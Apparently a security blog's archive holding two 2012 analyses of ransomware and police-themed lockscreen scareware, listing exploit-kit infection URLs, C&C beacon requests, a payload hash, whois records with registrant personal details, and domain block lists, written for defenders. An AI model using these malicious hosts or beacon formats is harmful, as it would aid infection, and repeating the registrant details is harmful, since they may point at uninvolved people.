Tag Archive for 'scareware'

Ransomware Gets Professional, Targeting Switzerland, Germany And Austria

In March I blogged about a ransomware which has been targeting various countries, locking down the victims computer due to “Child Porn and Terrorism”.

This week I spotted another ransomware campaign that is targeting Swiss, German, and Austrian internet users. This time the criminals seems to use a different schema to lock down the victims computer: violation of local copyright law.

*** Infection vector ****
The infection vector is a well known drive-by exploit kit called “Blackhole”. It is sold in underground forum and used by various criminal groups to infected computers “on the fly” by (ab)using one or more security vulnerabilities in the victims web browser (or a third party plug-in like Adobe Flash Player, Adobe Reader or Java). In this case a Blackhole exploit kit located at pampa04.com was involved to spread the ransomware:

hXXp://pampa04.com/main.php?page=d73d9795c56f8f33 [landing page]
-> hXXp://pampa04.com/data/ap2.php [JavaScript loading exploits]
–> hXXp://pampa04.com/Edu.jar [Java exploit]
—> hXXp://pampa04.com/w.php?f=5e91c&e=0 [Payload]

If the installed Java version on the victims computer is not up to date (unpatched), the downloaded jar file (Edu.jar) will exploit a well known vulnerability in Java which will trigger the download of the payload (Trojan) and finally execute it to infect the computer. The payload had a detection rate of 4/42 on Virustotal:

Filename: info.exe
MD5: 56f4d5837af32b12069576fae8c2b3c5
File size: 312.5 KB
AV-detection rate: 4/42

*** Analysis of the payload (Ransomware) ***
If the exploitation of the victims computer is successful, the Ransomware will install itself into the Application Data directory of the current user:

C:\Documents and Settings\Christoph\Application Data\itunes_service01.exe

Once the computer has been infected, the Ransomware will try to contact its Command&Control server (C&C) located at joonwalker.com using HTTP GET:

hXXp://joonwalker.com/unser1/redirector/redirector.php
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php
hXXp://joonwalker.com/ajax/libs/jquery/1.3.2/jquery.min.js
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/bg_ch.gif
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/js/keyboard.js

The landing URL redirector.php will determine the location of the infected computer by using GeoIP and will redirect the request to the matching site by using HTTP 302 Found, for example:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php

While investigating this C&C I’ve found several other URLs which shows that this Ransomware is targeting not only Switzerland but also several other countries:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/ (Switzerland)
hXXp://joonwalker.com/unser1/universalbezahlung/deutschland/ (Germany)
hXXp://joonwalker.com/unser1/universalbezahlung/oesterreich/ (Austria)
hXXp://joonwalker.com/unser1/universalbezahlung/england/ (England)
hXXp://joonwalker.com/unser1/universalbezahlung/frankreich/ (France)
hXXp://joonwalker.com/unser1/universalbezahlung/holland/ (Netherlands)
Country: Swiztzerland (SUISA)
Country: Germany (GVU)
   
Country: Austria (AKM)
Country: United Kingdom (PRS)
   
Country: France (SACEM)
Country: Netherlands (BUMA-STEMRA)
   

What lights up quickly when taking a look at these URLs is the fact that they are all written in German. So it looks like the cybercriminal behind this ransomware campaign is a German speaking person. While analysing all these different URLs I noticed that the cybercriminal has spent quite some time to prepare them. The language seems to be well written (I couldn’t find as many write errors as I would have expected). In addition it appears that the cybercriminal tried to get intel about where the victim can buy paysafecard (for the record: the victim has to pay a country specific amount of money to the cybercriminal using paysafecard to get his computer unlocked) and which association is tracking copyright infringement in the specific country. For example, he tells Swiss victims that they can obtain paysafecard on the federal railway station (SBB) and the MediaMark (a German based electronic discounter).

Another interesting finding is the fact that the Ransomware comes with an additional Trojan called Aldi Bot. Aldi Bot steals banking information (similar to ZeuS and SpyEye) and has some additional DDoS functionality.

Fortunately, Aldi Bot C&C traffic is very easy to identify due to the fact that this Trojan uses a specific User-Agent called “Aldi Bot FTW! :D”. In this case the Aldi Bot C&C is located at the same server/domain as the Ransomware itself but on a different URI:

GET /unser1/universalpanel/gate.php?hwid=XXX&pc=XXX&localip=XXX&winver=XXX HTTP/1.1
User-Agent: Aldi Bot FTW! :D
Host: joonwalker.com

*** Command&Control Infrastructure ***

The domain name used by this Ransomware and Aldi Bot is pointing to a Russian web hosting provider called “Amtel Svyaz”:

$ dig +short joonwalker.com
195.208.185.99

$ whois 195.208.185.99
inetnum: 195.208.184.0 – 195.208.187.255
netname: AMTEL-SVYAZ
descr: “Amtel Svyaz” ZAO
country: RU
org: ORG-AZ2-RIPE
admin-c: AG12682-RIPE
tech-c: AG12682-RIPE
tech-c: AG8732-RIPE
status: ASSIGNED PA
mnt-by: ROSNIIROS-MNT
mnt-domains: AMTELSV-MNT
mnt-routes: ROSNIIROS-MNT
source: RIPE # Filtered
[...]

The domain name joonwalker.com is registered through a Russian based domain registrar called Regtime Ltd (also known as webnames.ru):

Domain name: joonwalker.com

Name servers:
ns1.nameself.com
ns2.nameself.com

Registrar: Regtime Ltd.
Creation date: 2012-04-29
Expiration date: 2013-04-29

Registrant:
Huth Matthias
Email: huthmatthias@yahoo.de
Organization: Huth Matthias
Address: Bremenstrasse 12
City: Gladbeck
State: NRW
ZIP: 45964
Country: DE
Phone: +49.3051236167
Fax: +49.3051236169

According to whois the holder of this domain is “Huth Matthias” which has registered various other domain names this year:

arschenpustel.com
arschtrompete.com
arschtrompeteauto.com
arschtrompeteshop.com
bascvj.com
brauchnwanich.com
dergeldmacher.com
deutschecamworld.com
easyonlinebuxxx.com
fettehupenalter.com
fiftypercentworker.com
flobbo-online.com
fressehaltenlol.com
fuehlediebezahlung.com
fuehlediecon.com
geiledeutschecams.com
geileschnittendicketitten.com
geld-machen-mit-ebooks.com
geldverdienen-easy.com
gema-gebuehreneinzug.in
gemagatezor.com
gemagatezor.net
gewinnspiele-king.com
grosqa.com
helexxaione.com
hunnibezahlor.com
hunniconnector.com
ichmussconnecten.com
joonwalker.com
knallrattern.com
kohlhanser.com
konschtantin.com
kuemmeljoe.com
leckerfrischekacke.com
meineguetekak.com
meineherrenlaff.com
mightyporntube.com
mjun1.info
mongoneger.com
moxitoeex.com
moxitom.com
muellgeburten.com
muselfrauen.com
nulpapors.com
odrjaj.com
ratschuikakk.com
ratzeputzel.com
reich-durch-ebooks.com
toilettenspuelung.com
trueffelmueffel.com
tschaijikki.com
tujkea.com
universalpan1.com
universalpan2.com
urgeprotectar.com
vabrus.com
verdienjegek.com
whatwillhappenbaby.com
wonkeebonkii.com
xakacj.com
zeig-malmo-pse.in
zeig-malmopse.in
zeigmalmoepse.in
zeigmalmopse.in

All these domain names can be considered as malicious and should be blocked on your network edge.
To prevent this kind of infections you should ensure that your operating system as well as all installed applications (especially browser plug-ins) are up to date.

*** Further reading ***

Scareware Locks Down Computer Due To Child Porn and Terrorism

Recently, my sandbox came across a scareware that locks down the victim’s computer due to “terrorism and child pornography”. The malware is being detected by some AV vendors as “Win32/LockScreen”.

The schema is pretty simple: The criminals try to infect computers with scareware (eg. through Drive-By exploits). As soon as the computer is infected, the malware locks down the machine so that the user won’t be able to log in any more. The malware then displays a message to the user that the law enforcement agency XY found child pornography on the victims computer and that the his computer was used to send out “spam mails with terrorist motives”:

Attention!!!

This operating system is locked due to the violation of the laws of the United Kingdom! Following violations were detected:
Your IP address was used to visit websites containing pornography, child pornography, zoopillia and child abuse. Your computer also contains video files with Pornographic content, elements of violence and child pornograhpy! Spam-messages with terrorist motives were also sent from your computer

This computer lock is aimed to stop your illegal activity.

The message which is being displayed to the victim looks like this (click to enlarge):

What is interesting with this scareware is the dependency of the geo location of the victim’s computer. Before the scareware displays the message shown above, it contacts a central botnet command and control server (C&C) located in Ukraine (188.190.99.174 – AS197145 Infium LTD) using HTTP:

X-188.190.099.174.00080: GET /loc/gate.php?getpic=getpic HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Connection: Keep-Alive

188.190.099.174.00080-X: HTTP/1.1 200 OK
Date: Wed, XX Feb 2012 XX:XX:XX
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

http://188.190.99.174/pic/DE.bmp

In the first request the malware contacts the C&C using a parameter called “getpic”. The C&C will response with an URL containing the location of the image the malware should display to on the victim. The malware will follow the URL and download the BMP-file:

GET /pic/DE.bmp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Cache-Control: no-cache

Then the malware will determine the IP address of the victim’s computer by using the parameter “getip”:

X-188.190.099.174.00080: GET /loc/gate.php?getip=getip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Connection: Keep-Alive

Afterwards the malware displays a “lock screen” to the user using the response (=ip address) from the C&C and the image file downloaded before.

The interesting part is that you can identify the countries which are being hit by this attack by guessing the files on the botnet controller (country codes). So far, I’ve identified the following countries/URLs:

Location: http://188.190.99.174/pic/AT.bmp
Country: Austria (AT)
Agency: BUNDESPOLIZEI
Domain name: landes-kriminalt.net
Location: http://188.190.99.174/pic/DE.bmp
Country: Germany (DE)
Agency: BUNDESPOLIZEI
Domain name: landes-kriminalt.net
   
Location: http://188.190.99.174/pic/GB.bmp
Country: United Kingdom (GB)
Agency: METRPOPOLITIAN POLICE
Domain name: policemetropolitan.org
Location: http://188.190.99.174/pic/FR.bmp
Country: France (FR)
Agency: Gendarmerie nationale
Domain name: n-p-f.org
   
Location: http://188.190.99.174/pic/IT.bmp
Country: Itanly (IT)
Agency: Guardia di Finanza
Domain name: it-polizia.org
Location: http://188.190.99.174/pic/ES.bmp
Country: Spain (ES)
Agency: La policia ESPANOLA
Domain name: lapoliciaespanola.org

Most domain names mentioned above are misspelled, for example, the domain name landes-kriminalt.net is a misspelling of “Kriminalamt” which is equivalent to the Federal Police. All mentioned domain names are registered through registrar BIZCN (a registrar located in China):

Domain Name: LANDES-KRIMINALT.NET
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS3.CNMSN.COM
Name Server: NS4.CNMSN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 02-may-2011
Creation Date: 02-may-2011
Expiration Date: 02-may-2012

Last update of whois database: Thu, 01 Mar 2012 10:26:21 UTC
[...]

Domain name: landes-kriminalt.net

Registrant Contact:
Lilo
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Administrative Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Technical Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Billing Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

DNS:
ns3.cnmsn.com
ns4.cnmsn.com

Created: 2011-05-02
Expires: 2012-05-02

What nearly all domain names have in common is the fact that they have already been up since more than 8 months (Created: 2011-05-02). The same registrant has also registered other domain names:

landes-kriminalt.net
landes-kriminalt.org
bundeskriminalamtes.org
n-p-f.org
policemetropolitan.org
lapoliciaespanola.org
it-polizia.org
myxxxhot.org
nanosearchpro.net
porno-pir.org
privatetechnology.biz
sexysheep.org
tourboportal.com
tubechube.org

I’m asking myself how the criminals have managed not to get their domain names suspended for such a long time period. Please note that these domain names can be considered as malicious and should therefore be blocked at your network’s edge (web gateway / proxy / DNS) along with the botnet controller (188.190.99.174).

The described Scareware schema isn’t really new, Switzerland along with several other European countries were hit by a similar attack back in 2011:




economics-recluse
Scene
Urgent!